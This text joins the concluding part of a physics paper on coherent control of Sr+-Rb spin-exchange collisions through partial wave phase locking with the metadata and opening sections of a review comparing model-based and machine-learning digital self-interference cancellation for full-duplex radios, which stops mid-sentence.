prevented the application of quantum control techniques to collisions [14] and the observation of scattering resonances [15] in the multiple partial wave regime. A common way to combat partial wave scrambling is to cool the colliding species down to the ultracold regime, where collisions are dominated by a single initial partial wave. This eliminates the scrambling in the incident collision channel and reduces its severity in the outgoing channels, allowing for a high degree of control. The current state-of-art control techniques rely on cold molecules/atoms prepared in a well-defined internal state interacting with electric [16; 17; 18], microwave [19; 20; 21; 22; 23], optical [24], or magnetic fields [25; 26]. However, the use of external fields may not be suitable for some applications, especially when the collision partners lack electric and/or magnetic dipole moments [27]. Coherent control is an attractive method that does not rely on external fields. This technique involves preparing superpositions of the internal states of colliding particles to create interference effects that can be manipulated by changing the relative phase between the states [28; 29; 9]. Complete coherent control is possible over ultracold resonant exchange processes, such as spin, charge, or excitation exchange, where only a single partial wave is involved in both the incident and final collision channels [27]. These processes can be completely suppressed (or activated), via destructive (constructive) interference. By contrast, coherent control in the multiple partial wave regime can face a major challenge due to the partial wave scrambling. Here, we show that efficient coherent control in the multiple partial wave regime can be achieved using the partial wave phase locking (PWPL) effect [30; 31; 32; 33], which manifests in a coherent addition of different partial wave contribution. The physical origin of the PWPL effect can be attributed to the short-range nature of the spin-exchange interaction and the small magnitude of the centrifugal kinetic energy compared to the well depth of the interaction potential [34], enhancing quantum interference in the multiple partial wave regime. Here, we show this robust PWPL-assisted coherent control of spin exchange in ion-atom collisions (Sr\({}^{+}\)-Rb). Cold atom-ion hybrid systems have been realized experimentally as a promising platform for quantum science [32]. Hence our results can be readily verified in the laboratory. To our knowledge, this is the first approach to control collisions beyond the ultracold regime and can be applied to a wide range of quasiresonant process [33]. _Initial superposition and coherent control of cross section-_ Consider a binary collision \(A+B\), where \(A\) and \(B\) denote atoms or molecules initially prepared in a coherent superposition of internal angular momentum states : \[\ket{\psi_{A}}=N\left(\sqrt{\cos\eta}\ket{j_{A},m_{1A}}+\sqrt{\sin\eta}e^{i \frac{\beta}{2}}\ket{j_{A},m_{2A}}\right), \tag{1}\] \[\ket{\psi_{B}}=N\left(\sqrt{\sin\eta}e^{i\frac{\beta}{2}}\ket{j_{B},m_{1B}}+ \sqrt{\cos\eta}\ket{j_{B},m_{2B}}\right), \tag{2}\] where \(N=\frac{1}{\sqrt{\sin\eta+\cos\eta}}\) is a normalization factor, \(\eta\in[0,\pi/2]\) and \(\beta\in[0,2\pi]\) are the parameters that determine the relative population and phase of the superposition, \(j_{A}\) and \(j_{B}\) are the internal angular momenta of the colliding partners \(A\) and \(B\), and \(m_{1A}\), \(m_{2A}\), \(m_{1B}\), and \(m_{2B}\) are the corresponding projections on the space-fixed quantization axis \(Z\), subject to the constraint \(m_{1A}+m_{2B}=m_{1B}+m_{2A}\) imposed by rotational symmetry, which is required to obtain interference [35]. The initial state for the collision is given by the product \(\ket{\psi_{A}}\ket{\psi_{B}}\): \[\ket{\Psi_{sup}}=N^{2}\Bigg{(}\cos\eta\ket{m_{1A};m_{2B}}+\sin \eta e^{i\beta}\ket{m_{2A};m_{1B}}\] \[+\sqrt{\cos\eta\sin\eta}e^{i\frac{\beta}{2}}(\ket{m_{1A};m_{1B}}+ \ket{m_{2A};m_{2B}})\Bigg{)}, \tag{3}\] where we have defined \(\ket{m_{1A};m_{2B}}\equiv\ket{j_{A},m_{1A}}\ket{j_{B},m_{2A}}\) etc, for brevity. Due to rotational symmetry, the states \(\ket{m_{1A};m_{2B}}\) and \(\ket{m_{2A};m_{1B}}\) interfere with each other, while the states \(\ket{m_{1A};m_{1B}}\) and \(\ket{m_{2A};m_{2B}}\) instead give rise to satellite terms[27; 9]. For this reason, the superposition, \[\ket{\Psi_{ent}}=\cos\eta\ket{m_{1A};m_{2B}}+\sin\eta e^{i\beta}\ket{m_{2A};m_ {1B}}, \tag{4}\] provides better control, as previously demonstrated [36]. While this superposition is harder to prepare experimentally than that in eq. (3) because the colliding partners are entangled, it provides a useful reference point for comparing different control schemes, as shown below. The cross section from the non-entangled superposition (3) to a final state \(\ket{f}\) can be split into two parts: one related to the cross section from the entangled superposition (4), and one from the satellite terms: \[\sigma_{sup\to f}(\eta,\beta)=N^{4}\left(\sigma_{ent\to f}+\sigma_{sat \to f}\right), \tag{5}\] where \[\sigma_{ent\to f}(\eta,\beta)=\frac{\pi}{k^{2}}\sum_{\ell,m_{ \ell}}\sum_{\ell^{\prime},m^{\prime}_{\ell}}\bigg{|}\cos\eta\ T_{m_{1A}m_{2B} \ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\\ +\sin\eta\ T_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{ \prime}_{\ell}}\bigg{|}^{2}, \tag{6}\] and \[\sigma_{sat\to f}(\eta)=\cos\eta\sin\eta\left(\sigma_{m_{1A};m_{1B}\to f}+ \sigma_{m_{2A};m_{2B}\to f}\right). \tag{7}\] Here, \(\ell\) and \(\ell^{\prime}\) are the initial and final orbital angular momenta for the collision, while \(m_{\ell}\) and \(m^{\prime}_{\ell}\) are the projections of \(\ell\) and \(\ell^{\prime}\) on a space-fixed quantization axis \(Z\), \(T_{m_{1A}m_{2B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\) and \(T_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}\) are the \(T\)-matrix elements associated with the initial states \(\ket{m_{1A};m_{2B}}\) and \(\ket{m_{2A};m_{1B}}\), and \(k\) is the relative wavevector. To achieve good control of \(\sigma_{sup\to f}\), it is necessary to exert efficient control over \(\sigma_{ent\to f}\). However, even with good control over the latter, the inclusion of large satellite terms can significantly reduce overall control. This illustrates two important requirements for the efficient coherent control of \(\sigma_{sup\to f}\): (i) achieving the best possible control over \(\sigma_{ent\to f}\) and (ii) minimizing the value of \(\sigma_{sat\to f}\). To quantify these requirements, we define two control indices. First, the extent of control over the cross section from the entangled initial superposition \(\sigma_{ent\to f}\) can be defined as: \[R_{c,ent}=\frac{\left|\sigma_{int}\right|}{\sqrt{\sigma_{m_{1A};m_{2B}\to f} \sigma_{m_{2A};m_{1B}\to f}}}, \tag{8}\] where \[\sigma_{int}=\frac{\pi}{k^{2}}\sum_{\ell,m_{\ell}}\sum_{\ell^{\prime},m^{ \prime}_{\ell}}T_{m_{1A}m_{2B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell }}T^{*}_{m_{2A}m_{1B}\ell m_{\ell}\to f\ell^{\prime}m^{\prime}_{\ell}}, \tag{9}\] is the interference contribution to the integral cross section, and \(\sigma_{m_{1A};m_{1B}\to f}\) and \(\sigma_{m_{2A};m_{2B}\to f}\) are the cross sections from the states \(\ket{m_{1A};m_{1B}}\) and \(\ket{m_{2A};m_{2B}}\) respectively, to the final state \(\ket{f}\). The definition relies on the Schwartz inequality, so that \(R_{c,ent}\) lies between zero and one. Second, the effect of the satellite terms is quantified by: \[R_{sat}=\frac{min\left(\sigma_{m_{1A};m_{2B}\to f},\sigma_{m_{2A};m_{1B}\to f} \right)}{max\left(\sigma_{m_{1A};m_{1B}\to f},\sigma_{m_{2A};m_{2B}\to f} \right)}. \tag{10}\] Here, \(min\left(\sigma_{m_{1A};m_{2B}\to f},\sigma_{m_{2A};m_{1B}\to f}\right)\) and \((max\left(\sigma_{m_{1A};m_{1B}\to f},\sigma_{m_{2A};m_{2B}\to f}\right))\) is the smallest (largest) of the two values. Small satellite terms correspond to \(R_{sat}>>1\), a favorable condition for coherent control. Finally, we define a global control index as \(R_{c,sup}=max_{\eta}(V)\), where \(V\) represents the visibility that measures the oscillation of \(\sigma_{sup\to f}(\eta,\beta)\) when only the relative phase \(\beta\) is varied: \[V(\tilde{\eta})=\frac{\sigma_{sup\to f}(\tilde{\eta},\beta^{\tilde{\eta}}_{max})- \sigma_{sup\to f}(\tilde{\eta},\beta^{\tilde{\eta}}_{min})}{\sigma_{sup\to f}( \tilde{\eta},\beta^{\tilde{\eta}}_{max})+\sigma_{sup\to f}(\tilde{\eta},\beta^{ \tilde{\eta}}_{min})}, \tag{11}\] where \(\beta_{min}^{\tilde{\eta}}\) (\(\beta_{max}^{\tilde{\eta}}\)) is the value of \(\beta\) for which the cross-section is minimal (maximal) when \(\eta=\tilde{\eta}\). Like \(R_{c,ent}\), the values of \(R_{c,sup}\) are bound between 0 and 1. _Partial wave scrambling in coherent control-_ The control of the entangled cross section \(\sigma_{ent\to f}\) is limited by incoherent addition of the initial and final partial waves (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) in Eq. (6). For a given superposition determined by the parameters (\(\eta\) and \(\beta\)), some partial wave contributions (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) may experience constructive interference while others may exhibit destructive interference, suppressing the interference term in Eq. (9) [37]. This partial wave scrambling issue becomes more significant as the collision energy increases, along with the number of (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) contributions, and can result in complete loss of control. To quantify partial wave scrambling, we examine the distribution of the superposition parameters (\(\eta,\beta\)) for which each partial wave contribution reaches a minimum value, \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\arctan\left(\left| \frac{T_{m_{1A}=2B\ell m_{\ell}\to f\ell^{\prime}m_{\ell}^{\prime}}}{\left|T _{m_{2A}=1B\ell m_{\ell}\to f\ell^{\prime}m_{\ell}^{\prime}}\right|}\right.\right)\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(arg\left(T_{m_{1A}m_{2B}m_{\ell}\to f\ell^{\prime},m_{\ell}^{\prime}}\right)-arg\left(T_{m_{2A} m_{1B}\ell m_{\ell}\to f\ell^{\prime},m_{\ell}^{\prime}}\right)\) depending on the ratio of the magnitudes, and on the difference of phases (arguments) of the \(T\)-matrix elements, respectively. Note that the maximum parameters are simply obtained from: \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}+\eta_{max}^{\ell, \ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\pi/2\) and \(\beta_{max}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(\phi_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}=\)\(\pi\). The distribution of the optimal parameters \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) determines the degree of partial wave scrambling. A random distribution leads to a rapid decrease in control as the number \(N_{\ell}\) of significant partial wave contributions (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) increases, because \(R_{c,ent}\) scales as \(1/\sqrt{N_{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}}\)[37]. The solution of the partial wave scrambling problem lies in the clustering of the optimal parameters \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) and \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). As shown below, the clustering of \(\beta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) is manifest in the PWPL mechanism, which dramatically reduces the partial wave scrambling and thereby paves the way to coherent control in the multiple partial wave regime. _Application: Coherent control of spin relaxation in Sr\({}^{+}\)-Rb collisions-_ The PWPL phenomenon was first predicted to occur in spin relaxation in ion-atom collisions, making hybrid ion-atom systems [32] ideal for investigating PWPL assisted coherent control. Consider a rubidium atom (\({}^{87}\)Rb) prepared in a superposition of hyperfine states \(\left|2,-1\right\rangle_{B}\) and \(\left|2,0\right\rangle_{B}\), colliding with a trapped strontium ion \({}^{88}\)Sr\({}^{+}\) prepared in a superposition of Zeeman states \(\left|1/2,-1/2\right\rangle_{A}\) and \(\left|1/2,1/2\right\rangle_{A}\). We present the results for relaxation to the final states \(\left|1/2,-1/2\right\rangle_{A}\left|1,0\right\rangle_{B}\equiv\left|\downarrow\right\rangle\) and \(\left|1/2,+1/2\right\rangle_{A}\left|1,0\right\rangle_{B}\equiv\left|\uparrow\right\rangle\), as these states have larger cross-sections than the final states \(\left|1/2,\pm 1/2\right\rangle_{A}\left|1,-1\right\rangle_{B}\) and \(\left|1/2,\pm 1/2\right\rangle_{A}\left|1,1\right\rangle_{B}\). To motivate experimental studies we carried out rigorous coupled-channel (CC) calculations of Sr\({}^{+}\)-Rb collisions using state of the art ab-initio interaction potentials and second-order spin-orbit interactions, as described in [30]. To ensure numerical convergence of the results for collision energies ranging from 1 \(\mu\)K to 50 mK, we used extended CC basis sets including up to 80 partial waves. The control indices, \(R_{c,ent}\) and \(R_{c,sup}\), for Sr\({}^{+}\)-Rb calculated from exact CC results, are shown in Fig. 1 (a). The high value of the entangled control index, \(R_{c,ent}\), demonstrates that efficient control is possible in the multiple partial-wave regime. For the final state \(\left|\uparrow\right\rangle\), \(R_{c,ent}\) is close to 1, indicating complete control, whereas for the final state \(\left|\downarrow\right\rangle\), \(R_{c,ent}\) is around 0.5-0.6. Remarkably, the high entangled control index remains mostly independent of collision energy, indicating robust control over a wide energy range. Variation of the control can be caused by the presence of resonances, for example at \(E\)= 100 \(\mu\)K, 400 \(\mu\)K, and 5 mK. As expected, the control index for the non-entangled superposition, \(R_{c,sup}\), is affected by satellite terms, which can be quantified using the parameters \(R_{sat}\) (eq. 10) shown in Fig. 1 (b). For the final state \(\left|\uparrow\right\rangle\), the satellite terms are significant, resulting in a large difference between \(R_{c,ent}\) and \(R_{c,sup}\), with \(R_{c,sup}\) being around 0.2-0.3. In contrast, the satellite terms are small for the final state \(\left|\downarrow\right\rangle\), resulting in a small difference between \(R_{c,ent}\) and \(R_{c,sup}\), with \(R_{c,sup}\approx\) 0.4-0.5. The reason for the smaller impact of the satellite terms on the final state \(\left|\downarrow\right\rangle\) is that for this state, the interfering transitions conserve the total internal angular momentum projection, \(m_{A}^{i}+m_{B}^{i}=m_{A}^{f}+m_{B}^{f}\), whereas the transitions in the satellite terms do not. The situation is the opposite for the final state \(\left|\uparrow\right\rangle\). These results highlight a com plex trade-off between the partial wave scrambling and satellite terms. Even though partial wave scrambling is less significant for the final state \(\ket{\uparrow}\), the overall control is better for the final state \(\ket{\downarrow}\) due to the smaller effect of the satellite terms. To illustrate coherent control in the multiple partial wave regime, we consider the experimentally realistic case of Sr\({}^{+}\)-Rb collisions at 50 mK [30]. At this collision energy, approximately 5000 (\(\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}\)) partial wave states contribute to the cross sections. Figures 2(a)-(d) illustrate coherent control of the cross section by varying the phase angle \(\beta\) of the initial superposition (4). To obtain the best visibility \(V\), the value of \(\eta\) is fixed at \(\eta=\pi/2\) and \(21\pi/32\) for the final states \(\ket{\downarrow}\) and \(\ket{\uparrow}\), respectively. We observe a remarkable instance of complete control of scattering from the entangled superposition to the final state \(\ket{\uparrow}\), showing near vanishing of the cross section due to destructive interference (see Fig. 2 (c)). The minimum value of the cross-section is 6.2 a.u., which is three orders of magnitude smaller than the maximum value of 2517.3 a.u. This complete control is made possible by the clustering of the optimal control parameters \(\eta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) and \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) [see Fig. 3(c) and (d)], caused by PWPL. Note that if these parameters were randomly distributed, the entangled control index \(R_{c,ent}\) would be equal to \(\sim 1/\sqrt{5000}=0.01\), significantly smaller than the calculated value. When the initial superposition is non-entangled, complete destructive interference is countered by the presence of satellite terms, resulting in a variation from 1926.6 to 3350.2 a.u, which remains significant and certainly large enough to be detected in modern hybrid trapped ion-atom collision experiments [30; 31; 32; 33]. For the final state \(\ket{\downarrow}\), the clustering of \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}\ell}\) is less effective than for \(\ket{\uparrow}\), as shown in Fig.3 (a) and 4 (a). More detrimental for the control, the distribution of the other optimal parameter, \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\) [see Fig. 4 (b)] is broad, highlighting the importance of the distribution of \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). The PWPL effect locks the difference of T-matrix phases but not the ratio of their magnitudes, and thus does not guarantee the clustering of \(\eta_{min}^{\ell m_{\ell},\ell^{\prime}m_{\ell}^{\prime}}\). While this limitation can prevent PWPL from completely solving the problem of partial wave scrambling, we observe that despite the relatively broad distribution of ratios, a good degree of control is still achievable in the multiple partial wave regime, with \(\sigma_{sup\to f}(\eta,\beta)\) ranging from 2085.5 to 6131.7 a.u. The inclusion of the satellite terms has a slight impact on the control, resulting in a variation from 1827.7 to 3850.7 a.u. As noted above, the control of the scattering to the final states \(\ket{\downarrow}\) and \(\ket{\uparrow}\) is optimized in different regions of parameter space allowing for efficient control of the corresponding branching ratio \(\sigma_{\downarrow}/\sigma_{\uparrow}\), as shown in Fig. 2(e)-(f) at \(\eta=21\pi/32\). With the entangled superposition Eq. (4), extremely robust control is achieved, with \(\sigma_{\downarrow}/\sigma_{\uparrow}\) varying by three orders of magnitude (from 0.94941 to 960.66), thanks to the complete control of \(\sigma_{\uparrow}\). When using the non-entangled superposition (3), the presence of satellite terms limits the extent of control over the branching ratio to 0.66-2.26, which is large enough to be experimentally measurable. _Conclusion-_ In summary, we have shown that partial wave phase-locking enables coherent control in the multiple partial wave regime via a dramatic reduction of partial wave scrambling. The clustering of the optimal superposition parameters \(\beta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}_{\ell}}\) enabled by PWPL allows for the synchronized control of different partial wave contributions to the total scattering cross section. In cases where the distribution of the optimal control parameters \(\eta_{min}^{\ell,m_{\ell},\ell^{\prime},m^{\prime}_{\ell}}\) is broad, such as for the final state \(\ket{\downarrow}\), partial-wave scrambling is only partially eliminated by PWPL. Even though the satellite terms reduce the control with non-entangled superpositions, our rigorous CC calculations show that coherent control over state-to-state integral cross sections and of the branching ratios is significant and measurable. Therefore, collisions between \({}^{87}\)Rb and \({}^{88}\)Sr\({}^{+}\), observed in a series of recent experiments [30; 31; 32], appear to be ideal for the first experimental observation of coherent control of two-body scattering outside of the ultracold domain. As the PWPL phenomenon was shown to apply to any quasiresonant scattering process [33], a wide range of these processes could soon become amenable to robust coherent control. Furthermore, the extreme sensitivity of coherent control to PWPL effect implies that the study of collisions of atoms and molecules prepared in coherent superposition of internal states provides an ideal approach for investigating the PWPL effect. This work was supported by the U.S. Air Force Office of Scientific Research (AFOSR) under Contract No.FA9550-22-1-0361.
2308.05966
On the Learning of Digital Self-Interference Cancellation in Full-Duplex Radios
Full-duplex communication systems have the potential to achieve significantly higher data rates and lower latency compared to their half-duplex counterparts. This advantage stems from their ability to transmit and receive data simultaneously. However, to enable successful full-duplex operation, the primary challenge lies in accurately eliminating strong self-interference (SI). Overcoming this challenge involves addressing various issues, including the nonlinearity of power amplifiers, the time-varying nature of the SI channel, and the non-stationary transmit data distribution. In this article, we present a review of recent advancements in digital self-interference cancellation (SIC) algorithms. Our focus is on comparing the effectiveness of adaptable model-based SIC methods with their model-free counterparts that leverage data-driven machine learning techniques. Through our comparison study under practical scenarios, we demonstrate that the model-based SIC approach offers a more robust solution to the time-varying SI channel and the non-stationary transmission, achieving optimal SIC performance in terms of the convergence rate while maintaining low computational complexity. To validate our findings, we conduct experiments using a software-defined radio testbed that conforms to the IEEE 802.11a standards. The experimental results demonstrate the robustness of the model-based SIC methods, providing practical evidence of their effectiveness.
Jungyeon Kim, Hyowon Lee, Heedong Do, Jinseok Choi, Jeonghun Park, Wonjae Shin, Yonina C. Eldar, Namyoon Lee
2023-08-11T06:54:28Z
http://arxiv.org/abs/2308.05966v1
# On the Learning of Digital Self-Interference Cancellation in Full-Duplex Radios ###### Abstract Full-duplex communication systems have the potential to achieve significantly higher data rates and lower latency compared to their half-duplex counterparts. This advantage stems from their ability to transmit and receive data simultaneously. However, to enable successful full-duplex operation, the primary challenge lies in accurately eliminating strong self-interference (SI). Overcoming this challenge involves addressing various issues, including the nonlinearity of power amplifiers, the time-varying nature of the SI channel, and the non-stationary transmit data distribution. In this article, we present a review of recent advancements in digital self-interference cancellation (SIC) algorithms. Our focus is on comparing the effectiveness of adaptable model-based SIC methods with their model-free counterparts that leverage data-driven machine learning techniques. Through our comparison study under practical scenarios, we demonstrate that the model-based SIC approach offers a more robust solution to the time-varying SI channel and the non-stationary transmission, achieving optimal SIC performance in terms of the convergence rate while maintaining low computational complexity. To validate our findings, we conduct experiments using a software-defined radio testbed that conforms to the IEEE 802.11a standards. The experimental results demonstrate the robustness of the model-based SIC methods, providing practical evidence of their effectiveness. ## I Introduction Inband full-duplex communications have been widely considered as a potential solution for increasing spectral efficiency in future wireless networks. The fundamental idea behind this approach is to simultaneously transmit and receive data signals at the same frequency [1, 2, 3, 4, 5, 6]. In principle, this approach has the potential to double the spectral efficiency without requiring additional bandwidth. Moreover, when combined with advanced scheduling algorithms, it can also improve the cell and network throughput of unlicensed-band communication systems using listen-before-talk protocols. In practice, however, realizing the potential performance gains is not without challenges, as it is required to cancel a high self-interference (SI) signal at a receiver. In inband full-duplex communications, the transmit signal gives rise to very strong interference to the received signal of interest, which makes SI cancellation (SIC) more complicated. For example, the SI signal strength is about 100 dB larger than the desired signal power [1]. Intuitively, SIC can be achieved by subtracting the transmit from the received signal using the knowledge of the transmit signal waveform. In practice, SI signal cancellation is very challenging because the transmit signal experiences several radio frequency (RF) components such as filters, oscillators, and power amplifiers (PA), which result in linear and non-linear distortions of the transmit signal. In addition, the reflectors surrounding the mobile transceiver can generate time-varying SI signals. Thus, accurate cancellation of the time-varying and nonlinear SI signal is indispensable to enable inband full-duplex radios for next-generation wireless systems. In practical implementation, a SIC block in full-duplex radios typically involves a cascaded approach, utilizing an analog passive SI canceller, an analog active SI canceller, and a digital nonlinear adaptive SI canceller, as shown in Fig. 1. [1, 2, 3]. The analog passive SI canceller such as isolation and analog active SI canceller play a crucial role in attenuating the strong self-interference power to a level below the saturation threshold of the analog-to-digital converter (ADC), preventing signal saturation. On the other hand, the digital SIC is designed to further reduce the residual self-interference after analog SIC to the noise power level. Unlike analog SIC, digital SIC needs to address both the nonlinearity effects of the power amplifier (PA) and the time-varying channel response, which renders the digital SIC implementation challenging [1, 7, 8, 9, 10]. The nonlinear SIC problem is mathematically equivalent to nonlinear system identification in adaptive filter theory [11]. Therefore, traditional digital SIC algorithms are primarily based on mathematical models designed using domain knowledge [1, 7, 10, 12, 13]. The key merits of these model-based approaches are their computational efficiency and mathematical interpretability. However, these model-based methods may fail to represent the nonlinear SI channel when model-mismatch effects are pronounced. With the advent of machine learning, there has been a shift towards using data-driven methods, such as kernel-based adaptive filters [13] and deep neural networks (DNN) [10, 12]. These model-free techniques learn the complex SI channel through data-driven methods, utilizing sets of transmit and receive data samples. However, this approach is susceptible to changes in system environments and is less explainable compared to model-based approaches. The question of whether to use modeling or not for nonlinear and time-varying digital SIC is a crucial consideration in implementing SIC algorithms for full-duplex radios. However, despite its significance, most prior studies fail to adequately compare and address this particular topic [1, 7, 10, 12, 13]. In this article, we aim to address this question by highlighting the trade-offs of model-based and data-driven digital SIC algorithms for full-duplex radios. The article is structured as follows. In Section II, we provide an overview of state-of-the-art model-based digital SIC algorithms, focusing on how they utilize models to capture nonlinear distortions in the SI channel. We compare four different model-based digital SIC algorithms, highlighting their strengths and weaknesses in terms of SIC performance and implementation costs. In Section III, we present model-free approaches, which include kernel and DNN-aided SIC algorithms that do not rely on explicit modeling of the SI channel. In Section IV, we compare the performance of model-based and model-free SIC algorithms. In Section V, we evaluate a prototype implementation of the SIC algorithms using a software-defined radio (SDR) testbed compliant with the IEEE 802.11a Wi-Fi standards. Finally, our conclusion is given with a discussion in Section VI. ## II Model-Based Digital SIC Model-based SIC algorithms leverage mathematical formulations to represent the complex characteristics of nonlinear and time-varying SI channels. These are commonly based on domain knowledge such as the input-output relationship of the power amplifier (PA) and the time-varying channel impulse response. There are two important questions when developing model-based SIC algorithms. * How to construct models that represent the SI channel accurately with a small number of model parameters? * How to optimize the model parameters efficiently? The first question is about modeling accuracy and complexity. The latter one is about algorithm efficiency. Depending on the modeling and optimization methods, existing SIC algorithms can be categorized into four different types, which will be explained in the sequel and Fig. 2. ### _WH Model with LMS Optimizer_ One widely used approach is harnessing the Wiener-Hammerstein (WH) model [14], which consists of parallel Hammerstein polynomials (HPs) and linear finite impulse response (FIR) filters. This model offers notable advantages for representing SI channels by using domain knowledge. The HPs in the WH model map the transmit signal into multiple nonlinear signals using HP basis functions, allowing for flexible parameterization of the nonlinearity of the PA. Moreover, increasing the order of HPs enhances the model's ability to capture the nonlinear characteristics of the SI channel. The FIR filters in the model capture the dynamics of the linear transfer function in the SI channel, and increasing the number of FIR filter taps provides higher degrees of freedom for adapting to the dynamics of the linear transfer function. Another advantage of the WH model is its transparent relationship with linear systems, making it easier to implement in practical SIC algorithms. In contrast, other nonlinear models such as kernel-based and neural network models often require more complex parameterization. The WH model is utilized to parameterize the SI channel with parallel FIR filter coefficients for a given number of HPs. Consequently, the model parameters, which are the coefficients of the FIR filters, need to be optimized using a set of transmit and receive data samples as training data. The widely used objective for optimizing these parameters is to minimize the mean squared- error (MSE) between the desired and actual signals. In full-duplex radios, online sample-by-sample optimization is necessary to effectively track the dynamics of the SI channel. The least mean squares (LMS) algorithm, a stochastic gradient descent method, is commonly employed for SIC due to its simple implementation [1]. ### _WH Model with RLS Optimizer_ The main limitation of using the WH model in conjunction with LMS algorithms for SIC is the slow convergence rate, resulting from statistical correlations among the nonlinearly transformed signals by the HP basis functions. To address this low rate convergence issue, it is crucial to eliminate the correlation among the transformed signals. One approach is to use the recursive least squares (RLS) algorithm, which adaptively finds FIR filter coefficients to minimize the mean squared error, and offers faster convergence compared to LMS. However, RLS has extremely high computational complexity due to the estimation and inversion of the covariance matrix of transformed signals in an online fashion. Recently, a low-complexity variant of RLS for digital SIC has been proposed in [8], where the covariance matrix is estimated in an offline fashion and its inverse is used for orthogonalizing the transformed signals. Despite the faster convergence speed, this low-complexity RLS approach still requires large system memory to store the covariance matrix, Fig. 1: A block diagram of a full-duplex wireless system cascaded by circulator isolation, analog SIC, and digital SIC blocks. which can be a limitation. Additionally, it is limited to use only when the transmit data symbols are stationary, as it cannot accurately orthogonalize transformed signals in the presence of non-stationary data signals resulting from adaptive modulation and coding techniques. This inaccurate covariance information can degrade the performance of SIC. ### _WIH Model with LMS Optimizer_ The Wiener-Ito-Hermite (WIH) model is an alternative method that uses Ito-Hermite polynomials (IHPs) instead of HPs to represent the SI channel. The IHPs have the intriguing property that the transformed signals by the IHPs are statistically orthogonal, provided that the transmit data follows a complex Gaussian distribution. This property is advantageous for full-duplex communication systems that use orthogonal frequency division multiplexing (OFDM) because the central limit theorem ensures that the distribution of OFDM converges to a complex Gaussian distribution for a large enough fast Fourier transform (FFT) size. The orthogonal property of the WIH model allows for the use of a simple LMS optimizer, which achieves the optimal convergence rate of SIC performance for full-duplex systems while having low computational complexity [9]. However, when the input signal distribution does not follow a complex Gaussian distribution, such as in the case of a single-carrier (SC) waveform with conventional quadrature amplitude modulation (QAM) symbols, the SIC algorithm using the WIH model combined with LMS optimizer slows down the convergence significantly because the orthogonal structure of the IHPs is destroyed. ### _Adaptive WH Model with LMS Optimizer_ SI canceller that employs the WIH-LMS algorithm faces a major obstacle in that the algorithm requires the input to follow a complex Gaussian distribution. While this is generally true in an OFDM system, it may not be accurate for single-carrier systems where the input distribution may vary due to adaptive modulation and coding on a packet-to-packet basis. To address this issue, the adaptive orthonormal polynomial LMS (AOP-LMS) algorithm has been recently proposed [15]. This algorithm is a powerful extension of the WIH-LMS algorithm, designed to tackle non-stationary and arbitrary transmit data distributions. Unlike the WIH-LMS algorithm, which uses the HPs as the basis functions, the AOP-LMS algorithm generates a set of orthonormal basis functions using the moments of the input distribution. This makes it better suited to handle input distributions that may change over time. To estimate the moment parameter, the AOP-LMS algorithm uses a sample mean estimator, which requires a small number of training samples. The orthonormal property of the basis functions enables the simple LMS optimizer to achieve the optimal convergence rate for SIC in full-duplex systems while maintaining low computational complexity. Thanks to these advantages, the AOP-LMS algorithm is a highly effective tool for handling non-stationary and arbitrary input distributions in a variety of applications. ## III Data-Driven Digital SIC In this section, we review recent advancements in model-free SIC algorithms that leverage machine learning techniques. The popularity of model-free approaches for digital SIC is on the rise due to the increasing abundance of datasets and the enhanced power of modern deep learning pipelines. The Fig. 2: Block diagrams of the model-based and the model-free digital SIC algorithms. primary objective of model-free SIC techniques is to learn the expected output from a vast amount of input data. In contrast to model-based approaches that leverage domain knowledge for the nonlinear SI channel, model-free frameworks treat the nonlinear SIC channel as a black box and train their parameters using input and output data points. The key factor in model-free SIC algorithms is their ability to train the black box accurately. However, the major challenge is that the algorithm and the trained function should be adaptable to track the time-varying channel of SI. Overall, the success of the model-free SIC approach lies in its capacity to learn effectively from data and adapt to the evolving SI channels. ### _Data-Driven Kernel Model with LMS Optimizer_ A data-driven approach to modeling the nonlinear SI channel is to use kernel-based methods in reproducing kernel Hilbert spaces (RKHSs) [13]. In statistical learning theory, an unknown function defined over RKHS can be represented as a finite linear combination of kernel products evaluated on the input points in the training set data. Selecting an appropriate reproducing kernel function with continuous, symmetric, and positive definite properties is crucial. The Gaussian kernel is a commonly used choice for kernel adaptive filters due to its universal modeling capability, desirable smoothness, and numerical stability. Its properties make it a suitable choice for representing the nonlinear SI channel using data-driven methods. The kernel least-mean-square (K-LMS) algorithm is a modified version of the LMS algorithm, which operates on RKHS. While the traditional LMS algorithm operates on a finite-dimensional vector space, K-LMS operates on an infinite-dimensional space, which makes it more effective in nonlinear signal processing tasks. However, the naive K-LMS method suffers from a major drawback - it requires the optimization of an enormous number of parameters. This is because the algorithm expresses the parameters as a linear 